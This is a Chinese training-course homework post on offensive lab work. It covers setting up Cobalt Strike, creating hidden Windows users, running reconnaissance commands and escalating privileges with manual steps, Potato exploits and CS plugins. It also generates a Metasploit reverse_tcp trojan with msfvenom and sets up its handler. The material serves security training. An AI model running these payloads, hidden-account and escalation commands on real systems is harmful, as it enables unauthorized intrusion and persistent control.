网安实训第九日作业

一、CS安装

java环境

服务端和客户端都需要java环境

客户端

下载cobaltstrike压缩包并解压

服务端

将server文件夹复制到服务端

二、总结用户组和用户、windows信息搜集命令

1.用户

# 显示所有用户
net user
# 创建用户
net user user1 password1 /add
# 删除用户
net user user1 /del
# 创建隐藏用户
net user user2$ password2 /add
# 删除隐藏用户
net user user2$ /del

2.用户组

# 新建用户组:
net localgroup users /add
# 删除用户组:
net localgroup users /de1
# 添加用户到组:
net localgroup users user1 /add
# 从组中删除用户:
net localgroup users user1 /del
# 普通用户提权:(也即是将用户添加到管理员组中)
net localgroup administrator user1 /add

3.windows信息搜集命令

systeminfo打印系统信息
whoami获取当前用户名
whoami /priv 当前账户权限
ipconfig网络配置信息
ipconfig /displaydns显示DNS缓存
arp -a打印arp表
net user列出用户
net user username关于用户的信息
net localgroup 列出所有组
net localgroup GROUP关于指定组的信息
tasklist /svc列出进程列表
net start列出启动的服务
ver操作系统版本类型

三、总结手工提权思路,拿土豆提权

1.手工提权思路

(1)信息收集

系统信息:首先,使用如systeminfo、ver、uname -a(Linux)等命令收集目标系统的基本信息,包括操作系统版本、补丁安装情况、系统架构(32位或64位)、网络配置等。
服务和进程:通过tasklist /svc(Windows)、ps aux(Linux)等命令查看系统上运行的服务和进程,特别注意那些具有潜在提权风险的服务。
用户权限:使用whoami(Windows)、id(Linux)等命令检查当前用户权限,并评估是否足以执行进一步的提权操作。

(2)漏洞扫描与分析

工具扫描:利用Windows-Exploit-Suggester、Linux_Exploit_Suggester等自动化工具,根据收集到的系统信息比对已知漏洞数据库,查找可能存在的未修复漏洞。
手动分析:当自动化工具无法发现漏洞或信息不足时,手动分析系统的:
配置文件(如C:\Windows\System32\drivers\etc\hosts、/etc/passwd、/etc/shadow等)
日志文件(如C:\Windows\System32\winevt\Logs、/var/log)等
寻找可能的提权路径或配置错误。

(3)漏洞利用

筛选EXP:根据漏洞扫描结果,选择与目标系统架构和版本相匹配的EXP。确保EXP的可靠性和稳定性,避免在提权过程中引发安全问题。
上传与执行:将选定的EXP上传到目标系统,可通过网络共享、Web服务器上传、社会工程学等方式实现。执行前,确保EXP的执行环境(如依赖的库、权限要求)已满足,并测试EXP在隔离环境中的表现。

(4)权限提升

执行EXP:在确认环境安全后,执行EXP。如果成功,将获取更高的系统权限。
巩固权限:一旦获得新权限,立即采取措施巩固权限,如创建后门、提升用户权限至管理员级别。
深度搜索:利用新权限探索系统,寻找其他潜在的提权途径或敏感信息。

2.土豆提权

土豆资源

GodPotato

https://github.com/beichendream/godpotato

SweetPotato

https://github.com/ccob/sweetpotato

BadPotato

https://github.com/beichendream/badpotato

RoguePotato

https://github.com/antonioCoco/roguepotato

CandyPotato

https://github.com/klezvirus/candypotato

EfsPotato

https://github.com/zcgonvh/efspotato

MultiPotato

https://github.com/S3cur3Th1sSh1t/MultiPotato

RasmanPotato

https://github.com/crisprss/RasmanPotato

PetitPotato

https://github.com/wh0amitz/PetitPotato

JuicyPotatoNG

https://github.com/antonioCoco/JuicyPotatoNG

PrintNotifyPotato

https://github.com/BeichenDream/PrintNotifyPotato

CoercedPotato

https://github.com/Prepouce/CoercedPotato

四、用CS插件提权

服务端进入Server目录,对teamserver和TeamServerImage文件添加权限

chmod +x teamserver
chmod +x TeamServerImage

成功后文件名后会有*

启动时设置一个服务器ip和密码

./teamserver <ip> <password>

​启动后会生成一个端口,这里是50050

客户端打开cs,输入前面设置的ip,密码和生成的端口

在脚本管理器里添加以下插件

创建监听器

生成可执行文件木马,传输到winserver2012中

​ 

在虚拟机中双击木马文件,在cs中出现记录,右键选择插件进行提权

提权成功

五、MSF提权

1.安装msf

curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall && \chmod 755 msfinstall && \./msfinstall

2.启动msf :msfconsole

3.生成木马

msfvenom -p windows/meterpreter/reverse_tcp lhost=server-ip lport=3185 -f exe -o bilmsf.exe

配置参数

use exploit/multi/handler
show options
set payload windows/meterpreter/reverse_tcp
set lport 3185
set lhost server-ip
show options

4.监听木马

5.将木马传输到目标机,双击运行

6.设置提权模块(找漏洞),提权

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值